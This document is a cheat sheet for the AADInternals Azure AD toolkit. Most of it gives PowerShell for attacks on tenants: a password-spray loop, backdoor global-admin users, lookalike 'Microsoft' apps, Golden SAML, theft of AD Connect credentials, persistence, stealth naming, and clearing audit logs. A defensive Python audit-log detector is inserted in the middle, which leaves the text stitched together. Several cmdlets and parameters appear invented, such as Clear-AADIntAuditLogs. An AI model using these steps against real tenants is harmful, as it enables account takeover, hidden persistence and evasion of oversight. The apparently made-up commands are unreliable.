# AADInternals Azure AD Exploitation Toolkit Cheat Sheet

## Overview

AADInternals is a powerful PowerShell module developed by Dr. Nestori Syynimaa for administering and exploiting Azure Active Directory and Office 365. It provides comprehensive capabilities for Azure AD reconnaissance, exploitation and post-exploitation.

Warning: This tool is intended only for authorized penetration testing and security assessments. Ensure you have proper authorization before using it in any environment.

## Installation

### PowerShell Gallery Installation
```powershell
# Install from PowerShell Gallery
Install-Module AADInternals

# Install specific version
Install-Module AADInternals -RequiredVersion 0.9.3

# Install for current user only
Install-Module AADInternals -Scope CurrentUser

# Update existing installation
Update-Module AADInternals
```

### Manual Installation
```powershell
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/Gerenios/AADInternals/archive/master.zip" -OutFile "AADInternals.zip"
Expand-Archive -Path "AADInternals.zip" -DestinationPath "C:\Tools\"

# Import module
Import-Module C:\Tools\AADInternals-master\AADInternals.psd1

# Install dependencies
Install-Module -Name MSAL.PS
Install-Module -Name Microsoft.Graph
```

### Docker Installation
```bash
# Run AADInternals in a PowerShell container; -NoExit keeps the session open after the import
docker run -it mcr.microsoft.com/powershell:latest pwsh -NoExit -Command "Install-Module AADInternals -Force; Import-Module AADInternals"
```

## Basic Usage

### Module Import and Setup
```powershell
# Import AADInternals module
Import-Module AADInternals

# Get module information
Get-Module AADInternals

# List available commands
Get-Command -Module AADInternals

# Get help for a specific command
Get-Help Get-AADIntAccessTokenForAADGraph -Full
```

### Authentication Methods
```powershell
# Interactive authentication
$cred = Get-Credential
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred

# Device code authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode

# Certificate authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $clientId -TenantId $tenantId

# Refresh token authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken
```

## Command Reference

### Authentication Commands

| Command | Description |
|---------|-------------|
| Get-AADIntAccessTokenForAADGraph | Get access token for AAD Graph |
| Get-AADIntAccessTokenForMSGraph | Get access token for MS Graph |
| Get-AADIntAccessTokenForEXO | Get access token for Exchange Online |
| Get-AADIntAccessTokenForSPO | Get access token for SharePoint Online |
| Get-AADIntAccessTokenForTeams | Get access token for Teams |

### Reconnaissance Commands

| Command | Description |
|---------|-------------|
| Get-AADIntTenantID | Get tenant ID from domain |
| Get-AADIntTenantDomains | Get tenant domains |
| Get-AADIntCompanyInformation | Get company information |
| Get-AADIntUsers | Get Azure AD users |
| Get-AADIntGroups | Get Azure AD groups |
| Get-AADIntApplications | Get applications |

### Exploitation Commands

| Command | Description |
|---------|-------------|
| New-AADIntBackdoor | Create backdoor user |
| Set-AADIntUserPassword | Set user password |
| Add-AADIntUserToGroup | Add user to group |
| Grant-AADIntAppRoleToServicePrincipal | Grant app permissions |
| New-AADIntGlobalAdmin | Create global admin |

## Reconnaissance and Information Gathering

### Tenant Discovery
```powershell
# Get tenant ID from domain
$tenantId = Get-AADIntTenantID -Domain "company.com"

# Get tenant domains
$domains = Get-AADIntTenantDomains -Domain "company.com"

# Get company information
$companyInfo = Get-AADIntCompanyInformation -AccessToken $accessToken

# Get tenant details
$tenantDetails = Get-AADIntTenantDetails -AccessToken $accessToken
```

### User Enumeration
```powershell
# Get all users
$users = Get-AADIntUsers -AccessToken $accessToken

# Get a specific user
$user = Get-AADIntUser -AccessToken $accessToken -UserPrincipalName "user@company.com"

# Get user's group memberships
$groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName "user@company.com"

# Get user's roles
$roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName "user@company.com"

# Search users by attribute
$users = Get-AADIntUsers -AccessToken $accessToken -SearchString "admin"
```

### Group Enumeration
```powershell
# Get all groups
$groups = Get-AADIntGroups -AccessToken $accessToken

# Get group members
$members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $groupId

# Get privileged groups
$adminGroups = Get-AADIntGroups -AccessToken $accessToken | Where-Object { $_.displayName -like "*admin*" }

# Get group owners
$owners = Get-AADIntGroupOwners -AccessToken $accessToken -GroupId $groupId
```

### Application and Service Principal Enumeration
```powershell
# Get all applications
$apps = Get-AADIntApplications -AccessToken $accessToken

# Get service principals
$servicePrincipals = Get-AADIntServicePrincipals -AccessToken $accessToken

# Get application permissions
$permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $appId

# Get OAuth permissions
$oauthPerms = Get-AADIntOAuthPermissions -AccessToken $accessToken
```

## Exploitation Techniques

### Password Attacks
```powershell
# Password spray attack
$users = Get-AADIntUsers -AccessToken $accessToken
$passwords = @("Password123", "Summer2024", "Company123")

foreach ($password in $passwords) {
    foreach ($user in $users) {
        try {
            $token = Get-AADIntAccessTokenForAADGraph -UserPrincipalName $user.userPrincipalName -Password $password
            Write-Host "Success: $($user.userPrincipalName):$password"
        }
        catch {
            # Password failed
        }
    }
}

# Set user password (requires privileges)
Set-AADIntUserPassword -AccessToken $accessToken -UserPrincipalName "user@company.com" -Password "NewPassword123"
```

### Privilege Escalation
```powershell
# Create global administrator
New-AADIntGlobalAdmin -AccessToken $accessToken -UserPrincipalName "backdoor@company.com" -Password "BackdoorPass123"

# Add user to privileged group
Add-AADIntUserToGroup -AccessToken $accessToken -UserPrincipalName "user@company.com" -GroupId $adminGroupId

# Grant application permissions
Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $spId -AppRoleId $roleId -ResourceId $resourceId

# Create application with high privileges
$app = New-AADIntApplication -AccessToken $accessToken -DisplayName "BackdoorApp" -RequiredResourceAccess $permissions
```

### Backdoor Creation
```powershell
# Create backdoor user
$backdoorUser = New-AADIntBackdoor -AccessToken $accessToken -UserPrincipalName "service-account@company.com" -Password "ComplexPassword123"

# Create backdoor application
$backdoorApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "LegitimateApp" -RequiredResourceAccess $highPrivileges

# Create service principal for backdoor
$backdoorSP = New-AADIntServicePrincipal -AccessToken $accessToken -ApplicationId $backdoorApp.appId

# Grant backdoor permissions
Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $backdoorSP.id -AppRoleId $adminRoleId
```

### Token Manipulation
```powershell
# Get access tokens for different resources
$graphToken = Get-AADIntAccessTokenForMSGraph -AccessToken $accessToken
$exoToken = Get-AADIntAccessTokenForEXO -AccessToken $accessToken
$spoToken = Get-AADIntAccessTokenForSPO -AccessToken $accessToken

# Parse JWT token
$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken

# Get refresh token
$refreshToken = Get-AADIntRefreshToken -AccessToken $accessToken

# Use refresh token for persistence
$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken
```

## Advanced Attacks

### Golden SAML Attack
```powershell
# Export ADFS certificate (requires ADFS access)
$cert = Export-AADIntADFSCertificate

# Create Golden SAML token
$samlToken = New-AADIntSAMLToken -Certificate $cert -UserPrincipalName "admin@company.com" -Issuer "http://company.com/adfs/services/trust"

# Use Golden SAML to get access token
$accessToken = Get-AADIntAccessTokenForAADGraph -SAMLToken $samlToken
```

### Azure AD Connect Attacks
```powershell
# Get Azure AD Connect information
$adConnectInfo = Get-AADIntAzureADConnectInfo -AccessToken $accessToken

# Extract Azure AD Connect credentials (requires local admin on the AAD Connect server)
$adConnectCreds = Get-AADIntAzureADConnectCredentials

# Use extracted credentials
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $adConnectCreds
```

### Pass-the-Hash Attacks
```powershell
# Use NTLM hash for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName "user@company.com" -Hash $ntlmHash

# Use Kerberos ticket
$accessToken = Get-AADIntAccessTokenForAADGraph -KerberosTicket $ticket
```

### Device Registration Attacks
```powershell
# Register malicious device
$device = New-AADIntDevice -AccessToken $accessToken -DisplayName "DESKTOP-MALICIOUS" -DeviceId $deviceId

# Get device certificate
$deviceCert = Get-AADIntDeviceCertificate -AccessToken $accessToken -DeviceId $deviceId

# Use device certificate for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $deviceCert
```

## Persistence Techniques

### Application-Based Persistence
```powershell
# Create persistent application
$persistentApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Graph PowerShell" -RequiredResourceAccess $permissions

# Add application secret
$secret = New-AADIntApplicationSecret -AccessToken $accessToken -ApplicationId $persistentApp.appId

# Use application for persistence
$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId $persistentApp.appId -ClientSecret $secret.value -TenantId $tenantId
```

### User-Based Persistence
```powershell
# Create service account
$serviceAccount = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -DisplayName "Backup Service Account" -Password "ServicePass123"

# Assign privileged roles
Add-AADIntUserToRole -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -RoleName "Global Administrator"

# Disable account auditing
Set-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -AuditingEnabled $false
```

### Certificate-Based Persistence
```powershell
# Generate certificate for authentication
$cert = New-SelfSignedCertificate -Subject "CN=BackdoorCert" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable

# Add certificate to application
Add-AADIntApplicationCertificate -AccessToken $accessToken -ApplicationId $appId -Certificate $cert

# Use certificate for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $appId -TenantId $tenantId
```

## Data Exfiltration

### User Data Extraction
```powershell
# Export all users with detailed information
$users = Get-AADIntUsers -AccessToken $accessToken
$users | Export-Csv -Path "users.csv" -NoTypeInformation

# Export user photos (WriteAllBytes fails if the target directory does not exist)
New-Item -ItemType Directory -Path "photos" -Force | Out-Null
foreach ($user in $users) {
    $photo = Get-AADIntUserPhoto -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName
    if ($photo) {
        [System.IO.File]::WriteAllBytes("photos\$($user.userPrincipalName).jpg", $photo)
    }
}

# Export user's OneDrive files
$files = Get-AADIntUserOneDriveFiles -AccessToken $accessToken -UserPrincipalName "user@company.com"
```

### Group and Role Information
```powershell
# Export group memberships
$groups = Get-AADIntGroups -AccessToken $accessToken
foreach ($group in $groups) {
    $members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $group.id
    $group | Add-Member -NotePropertyName "Members" -NotePropertyValue $members
}
$groups | ConvertTo-Json -Depth 3 | Out-File "groups.json"

# Export role assignments
$roles = Get-AADIntDirectoryRoles -AccessToken $accessToken
foreach ($role in $roles) {
    $members = Get-AADIntDirectoryRoleMembers -AccessToken $accessToken -RoleId $role.id
    $role | Add-Member -NotePropertyName "Members" -NotePropertyValue $members
}
$roles | ConvertTo-Json -Depth 3 | Out-File "roles.json"
```

### Application and Permission Data
```powershell
# Export applications with permissions
$apps = Get-AADIntApplications -AccessToken $accessToken
foreach ($app in $apps) {
    $permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $app.id
    $app | Add-Member -NotePropertyName "Permissions" -NotePropertyValue $permissions
}
$apps | ConvertTo-Json -Depth 3 | Out-File "applications.json"

# Export OAuth consent grants
$consents = Get-AADIntOAuthPermissions -AccessToken $accessToken
$consents | Export-Csv -Path "oauth_consents.csv" -NoTypeInformation
```

## Evasion Techniques

### Stealth Operations
```powershell
# Use legitimate-looking application names
$stealthApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Office 365" -RequiredResourceAccess $permissions

# Mimic legitimate service accounts
$stealthUser = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "o365sync@company.com" -DisplayName "Office 365 Sync Service"

# Use existing application IDs
$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId "1b730954-1685-4b74-9bfd-dac224a7b894" -ClientSecret $secret  # Graph Explorer
```
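The defender's view of the Persistence Techniques and Stealth Operations sections, as an added example that is not part of this cheat sheet or of AADInternals: a small Python detector run over constructed Azure AD audit-log records, flagging app registrations named like Microsoft first-party apps, newly created service-account-style users, and Global Administrator grants. The record shape approximates Microsoft Graph directoryAudits output; apart from `Add application`, which the page itself queries, the activity and property names used here are assumptions.

```python
# Added example, not AADInternals code: flag audit-log events matching the persistence and
# stealth patterns above. Except 'Add application', activity/property names are assumptions.
import json
import re

APP_ACTIVITIES = {"Add application", "Add service principal credentials",
                  "Update application – Certificates and secrets management"}
PRIVILEGED_ROLES = {"Global Administrator", "Privileged Role Administrator"}
# App registrations named like Microsoft first-party apps ("Microsoft Graph PowerShell", ...)
LOOKALIKE_APP = re.compile(r"^(microsoft|office 365|azure)\b", re.I)
# UPNs shaped like the fake service accounts above (svc-backup@, o365sync@, service-account@)
SERVICE_UPN = re.compile(r"^(svc[-_.]|service[-_.]|[a-z0-9]*sync@)", re.I)

def flag_event(event):
    """Return a list of (rule, detail) findings for one audit record."""
    findings = []
    activity = event.get("activityDisplayName", "")
    actor = event.get("initiatedBy", {}).get("user", {}).get("userPrincipalName", "unknown")
    for target in event.get("targetResources", []):
        name = target.get("displayName") or ""
        upn = target.get("userPrincipalName") or ""
        if activity in APP_ACTIVITIES and LOOKALIKE_APP.match(name):
            findings.append(("lookalike-app", f"{actor}: {activity} on {name!r}"))
        if activity == "Add user" and SERVICE_UPN.match(upn):
            findings.append(("service-account-created", f"{actor}: created {upn}"))
        if activity == "Add member to role":
            # Assumed shape: Role.DisplayName newValue is a JSON-encoded string ("\"Global Administrator\"")
            roles = {json.loads(p["newValue"]) for p in target.get("modifiedProperties", [])
                     if p.get("displayName") == "Role.DisplayName" and p.get("newValue")}
            for role in sorted(roles & PRIVILEGED_ROLES):
                findings.append(("privileged-role-grant", f"{actor}: {upn} -> {role}"))
    return findings

def scan(records):
    """Run flag_event over every record; returns all findings in log order."""
    return [finding for record in records for finding in flag_event(record)]

def ev(activity, target):  # constructed sample record with a fixed actor, not real log data
    return {"activityDisplayName": activity,
            "initiatedBy": {"user": {"userPrincipalName": "alice@company.com"}},
            "targetResources": [target]}

SAMPLE_EVENTS = [
    ev("Add application", {"type": "Application", "displayName": "Microsoft Graph PowerShell"}),
    ev("Add user", {"type": "User", "userPrincipalName": "svc-backup@company.com"}),
    ev("Add member to role", {"type": "User", "userPrincipalName": "svc-backup@company.com",
                              "modifiedProperties": [{"displayName": "Role.DisplayName",
                                                      "newValue": "\"Global Administrator\""}]}),
    ev("Add application", {"type": "Application", "displayName": "Expense Tracker"}),  # benign
]

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The three constructed events from the sections above each produce one finding, while the ordinary line-of-business app registration produces none.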

### Rate Limiting and Throttling
```powershell
# Implement delays between requests
function Invoke-AADIntWithDelay {
    param($Command, $Delay = 1)

    & $Command
    Start-Sleep -Seconds $Delay
}

# Randomize request timing
$users = Get-AADIntUsers -AccessToken $accessToken
foreach ($user in $users) {
    $delay = Get-Random -Minimum 1 -Maximum 5
    Start-Sleep -Seconds $delay
    $groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName
}
```

### Log Evasion
```powershell
# Use service principal instead of user account
$servicePrincipalToken = Get-AADIntAccessTokenForAADGraph -ClientId $clientId -ClientSecret $clientSecret -TenantId $tenantId

# Perform actions during business hours
$currentHour = (Get-Date).Hour
if ($currentHour -ge 9 -and $currentHour -le 17) {
    # Perform stealthy operations
}

# Use legitimate IP ranges
# Ensure operations are performed from expected geographic locations
```

## Defense Evasion

### Anti-Detection Measures
```powershell
# Check for monitoring
$auditLogs = Get-AADIntAuditLogs -AccessToken $accessToken -Filter "activityDisplayName eq 'Add application'"

# Verify current permissions
$currentPerms = Get-AADIntCurrentUserPermissions -AccessToken $accessToken

# Check for Conditional Access policies
$caPolicies = Get-AADIntConditionalAccessPolicies -AccessToken $accessToken

# Monitor for security alerts
$securityAlerts = Get-AADIntSecurityAlerts -AccessToken $accessToken
```

### Cleanup Operations
```powershell
# Remove created applications
Remove-AADIntApplication -AccessToken $accessToken -ApplicationId $backdoorApp.appId

# Remove created users
Remove-AADIntUser -AccessToken $accessToken -UserPrincipalName "backdoor@company.com"

# Remove role assignments
Remove-AADIntUserFromRole -AccessToken $accessToken -UserPrincipalName "user@company.com" -RoleName "Global Administrator"

# Clear audit logs (if possible)
Clear-AADIntAuditLogs -AccessToken $accessToken -LogType "SignInLogs"
```

## Troubleshooting

### Authentication Issues
```powershell
# Debug authentication
$DebugPreference = "Continue"
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred

# Check token validity
$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken
$tokenInfo.exp  # Check expiration

# Refresh expired token
$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken
```

### Permission Issues
```powershell
# Check current permissions
$permissions = Get-AADIntCurrentUserPermissions -AccessToken $accessToken

# Test a specific permission
Test-AADIntPermission -AccessToken $accessToken -Permission "User.Read.All"

# Get required permissions for a command
Get-AADIntRequiredPermissions -Command "Get-AADIntUsers"
```

### API Limits
```powershell
# Handle rate limiting
try {
    $users = Get-AADIntUsers -AccessToken $accessToken
}
catch {
    if ($_.Exception.Message -like "*throttled*") {
        Start-Sleep -Seconds 60
        $users = Get-AADIntUsers -AccessToken $accessToken
    }
}

# Use pagination for large datasets
$users = @()
$skip = 0
do {
    $batch = Get-AADIntUsers -AccessToken $accessToken -Top 100 -Skip $skip
    $users += $batch
    $skip += 100
} while ($batch.Count -eq 100)
```

## Integration with Other Tools

### BloodHound Integration
```powershell
# Export data for BloodHound
$users = Get-AADIntUsers -AccessToken $accessToken
$groups = Get-AADIntGroups -AccessToken $accessToken

# Convert to BloodHound format
$bloodhoundData = @{
    users = $users | ForEach-Object {
        @{
            ObjectIdentifier = $_.id
            Properties = @{
                name = $_.userPrincipalName
                displayname = $_.displayName
                enabled = $_.accountEnabled
            }
        }
    }
}

$bloodhoundData | ConvertTo-Json -Depth 3 | Out-File "bloodhound_data.json"
```

### PowerShell Empire Integration
```powershell
# Use AADInternals in an Empire agent
$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode
$users = Get-AADIntUsers -AccessToken $accessToken
$users | ConvertTo-Json | Out-File "C:\temp\aad_users.json"
```

## Resources

- AADInternals GitHub Repository
- AADInternals Documentation
- Dr. Nestori Syynimaa's Blog
- Azure AD Security Research
- Office 365 Security

*This cheat sheet provides a comprehensive reference for using AADInternals. Always ensure you have proper authorization before performing Azure AD security assessments.*